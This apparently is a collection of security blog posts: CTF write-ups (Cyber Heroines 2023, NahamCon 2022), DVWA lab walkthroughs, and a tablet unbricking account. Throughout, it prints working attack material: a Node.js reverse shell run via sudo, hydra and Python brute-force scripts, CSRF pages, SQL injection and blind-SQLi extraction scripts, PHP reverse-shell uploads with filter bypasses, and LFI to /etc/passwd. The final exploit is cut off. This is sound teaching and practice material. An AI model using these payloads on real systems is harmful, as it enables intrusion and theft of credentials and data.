angoose@stocker:~$ sudo -l [sudo] password for angoose: Sorry, try again. [sudo] password for angoose: Matching Defaults entries for angoose on stocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User angoose may run the following commands on stocker: (ALL) /usr/bin/node /usr/local/scripts/*.js
we can escalate our privilege with node

Payload:

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("bash", []); var client = new net.Socket(); client.connect(8888, "127.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })();
Reference: https://www.revshells.com/

save this as js file and run using sudo and path traversal.

Now we are root.

Happy Hacking

Cyber Heroines CTF 2023

Fri, 08 Sep 2023 00:00:00 +0000

Competition Begins: 5:00 PM EST Sept 8, 2023,
Competition Ends: 5:00 PM EST Sept 10, 2023

https://cyberheroines.ctfd.io/

Crypto

Sophie Wilson

Description:

Sophie Mary Wilson CBE FRS FREng DistFBCS (born Roger Wilson; June 1957) is an English computer scientist, who helped design the BBC Micro and ARM architecture. Wilson first designed a microcomputer during a break from studies at Selwyn College, Cambridge. She subsequently joined Acorn Computers and was instrumental in designing the BBC Micro, including the BBC BASIC programming language whose development she led for the next 15 years. She first began designing the ARM reduced instruction set computer (RISC) in 1983, which entered production two years later. - Wikipedia Entry Chal: Help this designer of microprocessors solve this RSA challenge. Author: Prajakta n = 784605825796844081743664431959835176263022075947576226438671818152943359270141637991489766023643446015742865872000712625430019936454136740701797771130286509865524144933694390307166660453460378136369217557779691427646557961148142476343174636983719280360074558519378409301540506901821748421856695675459425181027041415137193539255615283103443383731129040200129789041119575028910307276622636732661309395711116526188754319667121446052611898829881012810646321599196591757220306998192832374480348722019767057745155849389438587835412231637677550414009243002286940429895577714131959738234773350507989760061442329017775745849359050846635004038440930201719911010249665164009994722320760601629833907039218711773510746120996003955187137814259297909342016383387070174719845935624155702812544944516684331238915119709331429477385582329907357570479058128093340104405708989234237510349688389032334786183065686034574477807623401744101315114981390853183569062407956733111357740976841307293694669943756094245305426874297375074750689836099469106599572126616892447581026611947596122433260841436234316820067372162711310636028751984204768054655406327047223250327323182558843986421816373935439976256688835521454318161553726050385094844798296897844392636332777 e = 5 c = 268593521627440355433888284074970889184087304017829415653214811933857946727694253029979429970950656279149253529187901591829277689165827531120813402199222392031974802458605195286640398523506218117737453271031755512785665400604866722911900724895012035864819085755503886111445816515363877649988898269507252859237015154889693222457900543963979126889264480746852695168237115525211083264827612117674145414459016059712297731655462334276493
Here the e is small and n is too large, so m^e < N

We can get the message by just doing 5th root of c.

Python code:

import gmpy2 from Cryptodome.Util.number import long_to_bytes n = 784605825796844081743664431959835176263022075947576226438671818152943359270141637991489766023643446015742865872000712625430019936454136740701797771130286509865524144933694390307166660453460378136369217557779691427646557961148142476343174636983719280360074558519378409301540506901821748421856695675459425181027041415137193539255615283103443383731129040200129789041119575028910307276622636732661309395711116526188754319667121446052611898829881012810646321599196591757220306998192832374480348722019767057745155849389438587835412231637677550414009243002286940429895577714131959738234773350507989760061442329017775745849359050846635004038440930201719911010249665164009994722320760601629833907039218711773510746120996003955187137814259297909342016383387070174719845935624155702812544944516684331238915119709331429477385582329907357570479058128093340104405708989234237510349688389032334786183065686034574477807623401744101315114981390853183569062407956733111357740976841307293694669943756094245305426874297375074750689836099469106599572126616892447581026611947596122433260841436234316820067372162711310636028751984204768054655406327047223250327323182558843986421816373935439976256688835521454318161553726050385094844798296897844392636332777 e = 5 c = 268593521627440355433888284074970889184087304017829415653214811933857946727694253029979429970950656279149253529187901591829277689165827531120813402199222392031974802458605195286640398523506218117737453271031755512785665400604866722911900724895012035864819085755503886111445816515363877649988898269507252859237015154889693222457900543963979126889264480746852695168237115525211083264827612117674145414459016059712297731655462334276493 gmpy2.get_context().precision = 600 m = gmpy2.root(c, 5) print(long_to_bytes(int(m)))
flag: chctf{d3516n3d_4c0rn_m1cr0_c0mpu73r}

Web

Grace Hopper

Description:

Grace Brewster Hopper (née Murray; December 9, 1906 – January 1, 1992) was an American computer scientist, mathematician, and United States Navy rear admiral. One of the first programmers of the Harvard Mark I computer, she was a pioneer of computer programming who invented one of the first linkers. Hopper was the first to devise the theory of machine-independent programming languages, and the FLOW-MATIC programming language she created using this theory was later extended to create COBOL, an early high-level programming language still in use today. - Wikipedia Entry Chal: Command this webapp like this Navy Real Admiral Alternate (Better) Connection: webapp Author: Sandesh
Link: https://cyberheroines-web-srv2.chals.io/vulnerable.php

On this site we can execute few commands on running dir command we can see all files:

The flag is in the https://cyberheroines-web-srv2.chals.io/cyberheroines.sh file.

flag: CHCTF{t#!$_!s_T#3_w@Y}

Forensics

Barbara Liskov

Description:

Barbara Liskov (born November 7, 1939 as Barbara Jane Huberman) is an American computer scientist who has made pioneering contributions to programming languages and distributed computing. Her notable work includes the development of the Liskov substitution principle which describes the fundamental nature of data abstraction, and is used in type theory (see subtyping) and in object-oriented programming (see inheritance). Her work was recognized with the 2008 Turing Award, the highest distinction in computer science. - Wikipedia Entry Chal: Return the flag back to the 2008 Turing Award Winner Author: Josh
file: BarbaraLiskov.pyc

In this file we can see one Base64 text: Y2hjdGZ7dV9uM3Yzcl9uMzNkXzBwdDFtNGxfcDNyZjBybTRuYzMsX3VfbjMzZF9nMDBkLTNuMHVnaF9wM3JmMHJtNG5jM30= this is the flag.

flag: chctf{u_n3v3r_n33d_0pt1m4l_p3rf0rm4nc3,_u_n33d_g00d-3n0ugh_p3rf0rm4nc3}

Margaret Hamilton

Description:

[Margaret Elaine Hamilton](https://en.wikipedia.org/wiki/Margaret_Hamilton_(software_engineer) (née Heafield; born August 17, 1936) is an American computer scientist, systems engineer, and business owner. She was director of the Software Engineering Division of the MIT Instrumentation Laboratory, which developed on-board flight software for NASA's Apollo program. She later founded two software companies—Higher Order Software in 1976 and Hamilton Technologies in 1986, both in Cambridge, Massachusetts. - [Wikipedia Entry](https://en.wikipedia.org/wiki/Margaret_Hamilton_(software_engineer) Chal: Return the flag to NASAs first software engineer. Author: Rusheel
file: Apollo-Mystery.png

This is archive file open this with 7zip and there is a new image margaret_flag.png it have flag in it.

flag: chctf{i_wr1t3_code_by_h4nd}

Happy Hacking

How I was able to unbrick my Lenovo TB-7504x

Wed, 28 Jun 2023 00:00:00 +0000

I wanted to install a custom ROM on my Lenovo TB-7504x.

First, I tried using SDK Platform-tools, but fastboot was not detecting my device in fastboot mode. It turned out that I was not using the correct driver. After installing all the required drivers, the device was detected. However, when I tried using commands, I encountered different errors such as "command unknown" or "can't run when locked" (even though OEM was unlocked and USB debugging was enabled).

I attempted to unlock the bootloader using fastboot and various combinations of commands. I even tried using sn.img, but it didn’t work.

Finally, I successfully unlocked the bootloader using mtkclient. Details on how to use this tool can be found in the repository.

However, After unlocking the bootloader, the device goes into a boot loop and displays an error message that says "Device verification failed. Device may not work properly. Booting in 5 seconds and it continues to boot repeatedly.

Then I used the RSA(Rescue and Support Assistant) tool to reset and go back to a normal state, but the process started and failed. Now Device is only showing a black screen.
I tried the SP flash tool to install custom ROM. SP flash tool was able to detect my device(It was not able to previously when the device was working) but it was giving an Authentication error auth file needed. I then tried auth files of other ROMs and different tools to bypass auth but no luck.

At this stage sometimes the SP flash tool was not detecting the device i tried pressing every combination of keys but not working.
When I removed the device from settings under Bluetooth & Devices, disconnected the cable, and used a different USB port the device was now detected.

Finally, I was able to disable auth and install custom ROM using this article: https://www.getdroidtips.com/bypass-mediateks-sp-flash-tool-authentication-protection/

Tools I used:

https://github.com/MTK-bypass/bypass_utility/releases

https://github.com/MTK-bypass/exploits_collection/releases/tag/v1.6

https://mtkusbdriver.com/mtk-usb-driver-v1-0-8/

https://spflashtools.com/

https://github.com/daynix/UsbDk/releases/

https://droidfilehost.com/download/download-libusb-win32-devel-filter-1-2-6-0-zip/

After installing all the tools needed, copy everything from the "exploits_collection" directory to the "bypass_utility" directory.
Now, run the main.py file and connect the device.

Output:

PS C:\Users\Jack\Downloads\bypass_utility-v.1.4.2\bypass_utility-v.1.4.2> python .\main.py [2023-06-28 10:54:15.788738] Waiting for device [2023-06-28 10:54:21.156132] Found port = COM3 [2023-06-28 10:54:21.257535] Device hw code: 0x335 [2023-06-28 10:54:21.257535] Device hw sub code: 0x8a00 [2023-06-28 10:54:21.257535] Device hw version: 0xcb00 [2023-06-28 10:54:21.257535] Device sw version: 0x0 [2023-06-28 10:54:21.257535] Device secure boot: True [2023-06-28 10:54:21.268082] Device serial link authorization: False [2023-06-28 10:54:21.268082] Device download agent authorization: True [2023-06-28 10:54:21.268082] Disabling watchdog timer [2023-06-28 10:54:21.268082] Disabling protection [2023-06-28 10:54:21.353772] Protection disabled PS C:\Users\AFTAB SAMA\Downloads\bypass_utility-v.1.4.2\bypass_utility-v.1.4.2>
Now, go to the options in the SP flash tool and change the connection setting to UART.

Run the SP flash tool and connect the device.

Here, I have used the "Lenovo_Tab_7_TB-7504X_MT6737M_HW20_India_S000041_180828_(by_firmwarefile.com)" firmware file with the same model Because It must use the same chipset as the device.

Thank you for reading this far. Happy hacking!

Brute Force - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

The goal is to brute force an HTTP login page.

Security level: low

On submitting the username and password we see that it is using get request

So let’s use hydra for brute force:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346"
Here we are using cookies because if we are not authenticated when we make the login attempts, we will be redirected to default login page.

Output:

┌─[aftab@parrot]─[~/Downloads/dvwa] └──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346" Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-17 23:50:56 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-get-form://127.0.0.1:80/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346 [80][http-get-form] host: 127.0.0.1 login: admin password: password 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-17 23:51:59
Login credentials found by hydra: admin:password

Security level: medium

It is still using get request.

so lets use hydra again:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium'
it still work but this time attack takes significantly longer then before.

on analyzing the login functionality we notice that the response is delayed by 2 or 3 seconds on wrong attempt.

Output:

┌─[aftab@parrot]─[~/Downloads/dvwa] └──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium' Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-18 09:17:45 [INFORMATION] escape sequence \: detected in module option, no parameter verification is performed. [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-get-form://127.0.0.1:80/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium [80][http-get-form] host: 127.0.0.1 login: admin password: password 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-18 09:18:50

Security level: high

It’s still get request but this time one additional parameter user_token

It’s using CSRF token so hydra wont help, let’s use python this time.

Python code:

import requests from bs4 import BeautifulSoup from requests.structures import CaseInsensitiveDict url = 'http://127.0.0.1/vulnerabilities/brute/' headers = CaseInsensitiveDict() headers["Cookie"] = "security=high; PHPSESSID=j422143437vlsdgqs0t1385420" r = requests.get(url, headers=headers) r1 = r.content soup = BeautifulSoup(r1, 'html.parser') user_token = soup.findAll('input', attrs={'name': 'user_token'})[0]['value'] with open("/usr/share/wordlists/rockyou.txt", 'rb') as f: for i in f.readlines(): i = i[:-1] try: a1 = i.decode() except UnicodeDecodeError: print(f'can`t decode {i}') continue r = requests.get( f'http://127.0.0.1/vulnerabilities/brute/?username=admin&password={a1}&Login=Login&user_token={user_token}#', headers=headers) r1 = r.content soup1 = BeautifulSoup(r1, 'html.parser') user_token = soup1.findAll('input', attrs={'name': 'user_token'})[0]['value'] print(f'checking {a1}') if 'Welcome' in r.text: print(f'LoggedIn: username: admin , password:{a1} ===found===') break
Output:

┌─[aftab@parrot]─[~/Downloads/dvwa] └──╼ $python brute_high.py checking 123456 checking 12345 checking 123456789 checking password LoggedIn: username: admin , password:password ===found===
Happy Hacking

Command Injection - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

we are given with functionality to ping device. we give ip or domain to ping.

input: localhost

output:

This is about command injection so backend must be appending our input ping command.

we can give our arbitrary command to execute with the help of pipe | ,so let’s create a simple payload :

|ls

it works on all low, medium and high.

Happy Hacking

Content Security Policy (CSP) Bypass - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level is currently: low.

from CSP we can import script from pastebin.com, so let’s put our script on pastebin and include that link:

payload=https://pastebin.com/dl/Lnamji4V

this JavaScript is executed on page.

Security level is currently: medium.

It’s using nonce to prevent execution of JavaScript includ but this value is static so we can add this to our payload:

nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=

payload=

Security level is currently: high.

It is making request to http://192.168.170.131/vulnerabilities/csp/source/jsonp.php?callback=solveSum to solve this lab we have to intercept this request and anything we set to callback’s value wil be executed so we can modify it to callback=alert(document.cookie); and alert will pop up.

Happy Hacking

Cross Site Request Forgery (CSRF) - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

Here we can change password, there is no csrf protection. We can create simple form to auto submit and change password of victim.

HTML code for CSRF:

<html> <body> <script>history.pushState('', '', '/')script> <form action="http://192.168.170.131/vulnerabilities/csrf/"> <input type="hidden" name="password_new" value="pass" /> <input type="hidden" name="password_conf" value="pass" /> <input type="hidden" name="Change" value="Change" /> <input type="submit" value="Submit request" /> form> <script> document.forms[0].submit(); script> body> html>
we can host this page so when victim visit page their password will automatically change.

I’m using python to host webpage:

Output:

C:\Users\AFTAB SAMA\Downloads>python -m http.server 80 Serving HTTP on :: port 80 (http://[::]:80/) ... ::ffff:192.168.173.222 - - [18/Aug/2022 18:03:11] "GET /csrf-test.html HTTP/1.1" 200 - ::ffff:192.168.173.222 - - [18/Aug/2022 18:03:12] code 404, message File not found ::ffff:192.168.173.222 - - [18/Aug/2022 18:03:12] "GET /favicon.ico HTTP/1.1" 404 -

Security level: medium

Same attack won’t work, looking at sourcecode we know that server checks where the request came from.

one way to get around is if we can upload our file in server.

Now first of all change csrf.html into csrf.php file, then set low security level and switch into file uploading vulnerability inside DVWA.

Here the above text file of html form is now saved as csrf.php is successfully uploaded in the server which you can see from given screenshot.

now we can use this new url: http://192.168.170.131/hackable/uploads/csrf.php

password changed.

Security level: high

This time it use csrf token. we can read this token if we have same origin and we can do that by uploading our payload to server as shown previously.

upload this code to server:

HTML code:

<html> <body> <p>TOTALLY LEGITIMATE AND SAFE WEBSITE p> <iframe id="myFrame" src="http://192.168.170.131/vulnerabilities/csrf" style="visibility: hidden;" onload="maliciousPayload()">iframe> <script> function maliciousPayload() { console.log("start"); var iframe = document.getElementById("myFrame"); var doc = iframe.contentDocument || iframe.contentWindow.document; var token = doc.getElementsByName("user_token")[0].value; const http = new XMLHttpRequest(); const url = "http://192.168.170.131/vulnerabilities/csrf/?password_new=hackerman&password_conf=hackerman&Change=Change&user_token="+token+"#"; http.open("GET", url); http.send(); console.log("password changed"); } script> body> html>
on visiting this url it will read token from DOM and create password change request to server.

Happy Hacking

DOM Based Cross Site Scripting (XSS) - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

We have option to select language and value is reflected in GET parameter default=English.

payload=

using this it will trigger an alert pop up with cookie values.

Security level: medium

we are stuck inside option tag so we have escape that and we can’t use script tag because that is blocked so we use image tag.

payload=" >

Security level: high

This time server is using whitelist we can bypass that by puting our payload after # because anything after # is not sent to server but still reflecting on the page.

payload=#

Happy Hacking

File Inclusion - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

In url there is GET parameter page used for including file.

url:http://192.168.170.131/vulnerabilities/fi/?page=include.php

By changing this file location we can read file on server.

url:http://192.168.170.131/vulnerabilities/fi/?page=/etc/passwd

Also work for medium.

Security level: high

we have one condition that file name should start with file.

we can bypass that with payload:file/../../../../../../etc/passwd path traversal.

Happy Hacking

File Upload - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

Create PHP reverse shell file rev.php.

Refference: https://www.revshells.com/

Listing IP: 192.168.170.131 port: 9001

netcat listener command: nc -lvnp 9001

upload the file rev.php and visit the url : http://192.168.170.131/hackable/uploads/rev.php

and you have reverse shell:

Output:

┌─[✗]─[aftab@parrot]─[~/Downloads/dvwa] └──╼ $nc -lvnp 9001 listening on [any] 9001 ... connect to [192.168.170.131] from (UNKNOWN) [172.17.0.2] 54022 SOCKET: Shell has connected! PID: 331 whoami www-data uname Linux
Security level: medium

This time it is blocking php file we can bypass that by changing:

Content-Type: application/x-php ==> Content-Type: image/png

we can also do that from browser go to inspect element ,Network tab resubmit the request so it show up on network tab select that upload request right click and Edit and Resend:

make changes and hit send button,visit the url and you have reverse shell.

Security level: high

Changing Content-Type is not working maybe server is verifying the file header signature.

add GIF98; at the start of our exploit file and rename it with rev.php.png.

but whene we visit it directly it is not working so we use file inclusion:

url: http://192.168.170.131/vulnerabilities/fi/?page=file/../../../hackable/uploads/rev.php.png <- security high

and we have reverse shell on our netcat listener.

Happy Hacking

JavaScript Attacks - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

Submit the word “success” to win.

we have phrase=ChangeMe and we have to change it to “success”. there is token and the value of token is md5(rot13(phrase).

rot13(“success”) = “fhpprff”

md5(“fhpprff”) = “38581812b435834ebf84ebcc2c6424d6”

so value of token and phrase:

token=38581812b435834ebf84ebcc2c6424d6&phrase=success

let’s submit this:

Security level: medium

The value of token for phrase=ChangeMe is: token=XXeMegnahCXX

if we look closely we can see that the value is “XX” + reverse of phrase + “XX”

so new value for “sseccus” will be “XXsseccusXX”

token=XXsseccusXX&phrase=success

Security level: high

JavaScript is performing following 3 steps to generate token:

reverse the value of phrase:

phrase=success

token=sseccus

prepend ‘XX’ at start and sha256:

token = ‘XX’ + token = ‘XXsseccus’

sha256(token) = sha256(“XXsseccus”) = “7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a”

append ‘ZZ’ and sha256:

token = token + ‘ZZ’ = “7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068aZZ”

sha256(token) = sha256(“7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068aZZ”) = “ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84”

token=ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84&phrase=success

let’s submit this:

Happy Hacking

Reflected Cross Site Scripting (XSS) - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

we have name field which is reflecting on page.

payload=

It triggers an alert pop up with cookie value.

Security level: medium

_payload of low level also works here: _

payload=

Security level: high

_payload of low level also works here: _

payload=

Happy Hacking

SQL Injection - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

We can detect SQL injection with ' on submiting this we get SQL error.

we can see all entries with ' or 1=1# :

We can extract all passwords with payload:

' UNION SELECT user, password FROM users#

Security level: medium

It’s using POST parameter and quotes are filtered, but ID value is directly added to the query so we dont even need quotes.

payload: 1 or 1=1 UNION SELECT user, password FROM users#

Security level: high

payload from low security also works here.

Payload: ' UNION SELECT user, password FROM users#

Happy Hacking

SQL Injection (Blind) - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

Payload to detect vulnerability: 1' and sleep(5)# it is taking 5 to response.

Python code to brute force version:

import requests from requests.structures import CaseInsensitiveDict headers = CaseInsensitiveDict() headers["Cookie"] = "security=low; PHPSESSID=to84ds41bhba7ub48s10a8qim0" url = 'http://192.168.170.131/vulnerabilities/sqli_blind/' for i in range(100): parameters = f"id=1'+and+length(version())%3d{i}%23&Submit=Submit" r = requests.get(url, headers=headers, params=parameters) if 'User ID exists in the database' in r.text: print(f'length = {i}') length = i break j = 1 for i in range(1, length+1): for s in range(30, 126): parameters = f"id=1'+and+ascii(substring(version(),{i},{j}))%3d{s}%23&Submit=Submit" r = requests.get(url, headers=headers, params=parameters) if 'User ID exists in the database' in r.text: print(chr(s), end='') break j += 1
Output:

length = 24 10.1.26-MariaDB-0+deb9u1 Process finished with exit code 0
Security level: medium

Payload to detect vulnerability: 1 and sleep(5) it is taking 5 to response.

Python code to brute force version:

import requests from requests.structures import CaseInsensitiveDict headers = CaseInsensitiveDict() headers["Cookie"] = "security=medium; PHPSESSID=to84ds41bhba7ub48s10a8qim0" headers["Content-Type"] = "application/x-www-form-urlencoded" url = 'http://192.168.170.131/vulnerabilities/sqli_blind/' for i in range(100): parameters = f"id=1+and+length(version())={i}&Submit=Submit" # parameters = {"id": f'1+and+length(version())={i}', "Submit": "Submit"} r = requests.post(url, headers=headers, data=parameters) if 'User ID exists in the database' in r.text: print(f'length = {i}') length = i break j = 1 for i in range(1, length+1): for s in range(30, 126): parameters = f"id=1+and+ascii(substring(version(),{i},{j}))={s}&Submit=Submit" r = requests.post(url, headers=headers, data=parameters) if 'User ID exists in the database' in r.text: print(chr(s), end='') break j += 1
Output:

length = 24 10.1.26-MariaDB-0+deb9u1 Process finished with exit code 0
Security level: high

Payload to detect vulnerability: 1' and sleep(5)# it is taking 5 to response.

Python code to brute force version:

import requests from requests.structures import CaseInsensitiveDict headers = CaseInsensitiveDict() headers["Cookie"] = "id=1%27+and+length%28version%28%29%29%3E0%23; security=high; PHPSESSID=to84ds41bhba7ub48s10a8qim0" url = 'http://192.168.170.131/vulnerabilities/sqli_blind/' for i in range(100): headers["Cookie"] = f"id=1'+and+length(version())%3d{i}%23; security=high; PHPSESSID=to84ds41bhba7ub48s10a8qim0" r = requests.get(url, headers=headers) if 'User ID exists in the database' in r.text: print(f'length = {i}') length = i break j = 1 for i in range(1, length+1): for s in range(30, 126): headers["Cookie"] = f"id=1'+and+ascii(substring(version(),{i},{j}))%3d{s}%23; security=high; PHPSESSID=to84ds41bhba7ub48s10a8qim0" r = requests.get(url, headers=headers) if 'User ID exists in the database' in r.text: print(chr(s), end='') break j += 1
Output:

length = 24 10.1.26-MariaDB-0+deb9u1 Process finished with exit code 0
Happy Hacking

Stored Cross Site Scripting (XSS) - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

we have name and message field let’s put our payload in message:

payload=

and it’s working it will trigger an alert pop up with cookie value.

Security level: medium

This time we put our paylod in name field we can easily bypass the maximum character limit by changing the maxlength attribute of input from DevTools. we change the case of our payload:

payload=

It will successfully trigger alert pop up with cookie value.

Security level: high

this time script tag is entirely blocked so we use different payload. method same as we used in medium.

payload=

Happy Hacking

Weak Session IDs - DVWA

Wed, 17 Aug 2022 00:00:00 +0000

Security level: low

cookie value is easily predictable it’s initially 0 and increment by 1 on regenerate.

Security level: medium

cookie value is set using time(); method.

Security level: high

It’s is similar to low level but it is doing md5 hash of that additionally.

Happy Hacking

NahamCon CTF 2022

Thu, 28 Apr 2022 00:00:00 +0000

April 28th, 12:00 PM PST - April 30th, 12:00 PM PST 48-Hour Competition

https://ctf.nahamcon.com/

Prisoner:

Have you ever broken out of jail ? Maybe it is easier than you think !

After starting the instance we are given ssh creds:

Password is “userpass”

ssh -p 32233 user@challenge.nahamcon.com
It turns out that the shell dropped us into a running python terminal. This can exit the python interpreter with the CTRL + D keys. then,we run some basic python to attain command execution and get the flag

flag{c31e05a24493a202fad0d1a827103642}
Flagcat:

Do you know what the cat command does in the Linux command-line ?

_Attachment: flagcat

cat flagcat

flag{ab3cbaf45def9056dbfad706d597fb53}
Quirky:

This file is seems to have some strange pattern…

Attachment: Quirky

given file is hex of image raw data we can use CyberChef to get the image it will give us QR code after parsing the QRcode it gives the flag

filters to use in CyberChef:

From Hex

Render Image

Parse QR code

flag{b7e2a32f5ae629dcfb1ac210d1f0c032}
Exit Vim:

Ah yes, a bad joke as old as time… can you exit vim?

Password is “userpass”

ssh -p 32686 user@challenge.nahamcon.com

we are inside vim just type:

:qa!

to exit vim

flag{ccf443b43322be5659150eac8bb2a18c}
Crash Override:

Remember, hacking is more than just a crime. It’s a survival trait.

Connect with:

nc challenge.nahamcon.com 30443

Attachment: Crash Override

looking at c code we know the buffer size=2048 so after finding padding=8 we can give any input > 2056 and it will give flag

python -c "print('a'* 2056)" | nc challenge.nahamcon.com 32216
flag{de8b6655b538a0bf567b79a14f2669f6}
Read The Rules:

Please follow the rules for this CTF!

Connect here: Read The Rules

flag is in source code

flag{90bc54705794a62015369fd8e86e557b}

Wizard:

You have stumbled upon a wizard on your path to the flag. You must answer his questions!

Connect with:

nc challenge.nahamcon.com 32201

it gives us the questions and we have to give input the answers

First Question: What is the ASCII plaintext corresponding to this binary string?

010110100110010101110010011011110111001100100000001001100010000001001111011011100110010101110011
From Binary: “Zeros & Ones”

Second Question: What is the ASCII plaintext corresponding to this hex string?

4f6820776f77777721204261736520313020697320636f6f6c20616e6420616c6c2062757420486578787878
From Hex: “Oh wowww! Base 10 is cool and all but Hexxxx”

Third Question: What is the ASCII plaintext corresponding to this octal string? (HINT: octal -> int -> hex -> chars)

535451006154133420162312701623127154533472040334725553046256234620151334201413347444030460563312201673122016730267164

Octal to HexaDecimal

From Hex

“We can represent numbers in any base we want”

Fourth Question: What is the ACII representation of this integer? (HINT: int -> hex -> chars)

8889185069805239596091046045687553579520816794635237831028832039457

Desimal to HexaDecimal

From Hex

“This is one big ‘ol integer!”

Fifth Question: What is the ASCII plaintext of this Base64 string?

QmFzZXMgb24gYmFzZXMgb24gYmFzZXMgb24gYmFzZXMgOik=
From Base64: “Bases on bases on bases on bases :)”

Last Question: What is the Big-Endian representation of this Little-Endian hex string?

293a2065636e657265666669642065687420776f6e6b206f7420646f6f672073277449
LITTLE to BIG ENDIAN

From Hex “It’s good to know the difference :)”

flag{c2ed35aba037cd93381b298caa2720ee}
Technical Support:

Want to join the party of GIFs, memes and emoji spam? Or just want to ask a question for technical support regarding any challenges in the CTF? Join us in the Discord – you might just find a flag in the #ctf-help channel!

flag is in description of #ctf-chat channel

flag{081fef2f11f3eec6059e3da9117ad3f0}
Personnel:

A challenge that was never discovered during the 2021 Constellations mission… now ungated :)

Attachment: app.py

looking at app.py it will remove first character from name parameter name = name[1:] and put it in regex

results = re.findall(r"[A-Z][a-z]*?" + name + r"[a-z]*?\n", users, setting) in regex .* means everything and we can escape other conditions with use of or operator “|”.

payload: A|.*|

flag{f0e659b45b507d8633065bbd2832c627}
Flaskmetal Alchemist:

Edward has decided to get into web development, and he built this awesome application that lets you search for any metal you want. Alphonse has some reservations though, so he wants you to check it out and make sure it’s legit.

Attachment: fma.zip

looking at app.py we can say that it maybe valnurable to orderby blind sqli

payload=

(CASE WHEN (SELECT (SUBTR(flag, 1,1)) from flag) = 'f' THEN name ELSE atomic_number END)--
it will sort by name if true and number if false here is python script to brute force flag:

import string from bs4 import BeautifulSoup import requests url = "http://challenge.nahamcon.com:31631/" data = {'search': '', 'order': "(CASE WHEN (SELECT (SUBSTR(flag, 1, 1)) from flag ) = 'f' THEN name ELSE atomic_number END)--"} x = requests.post(url, data=data) # x1 = BeautifulSoup(x.text, features='lxml').td.contents[0] # print(x1) s = 'flag{' + string.ascii_lowercase + '_' + '}' # print(s, type(s)) flag = '' for i in range(1, 100): h1 = len(flag) for k in s: if len(flag) > h1: continue data = {'search': '', 'order': f"(CASE WHEN (SELECT (SUBSTR(flag, {i}, 1)) from flag ) = '{k}' THEN name ELSE atomic_number END)--"} # print(f'checking {data.values()}') x = requests.post(url, data=data) if BeautifulSoup(x.text, features='lxml').td.contents[0] == '89': flag += k print(flag) if flag[-1] == '}': break
flag{order_by_blind}
Poller:

Have your say! Poller is the place where all the important infosec questions are asked.

there is a github link in cource code: https://github.com/congon4tor/poller

from looking at commit we know this is vulnerable to django PickleSerializer RCE and we also found secret_key in previous commits there is also one fake key

SECRET_KEY = 77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!

we can get the revese shell here but i don’t have vps so we go the easy way we know the file name is flag.txt first i created local server with python : python -m http.server 80

and expose it to internet with ngrok : ngrok http 80

now we craft our payload in a way that it will read file content and make a request to our server with that file content in GET request here is final exploit in python :

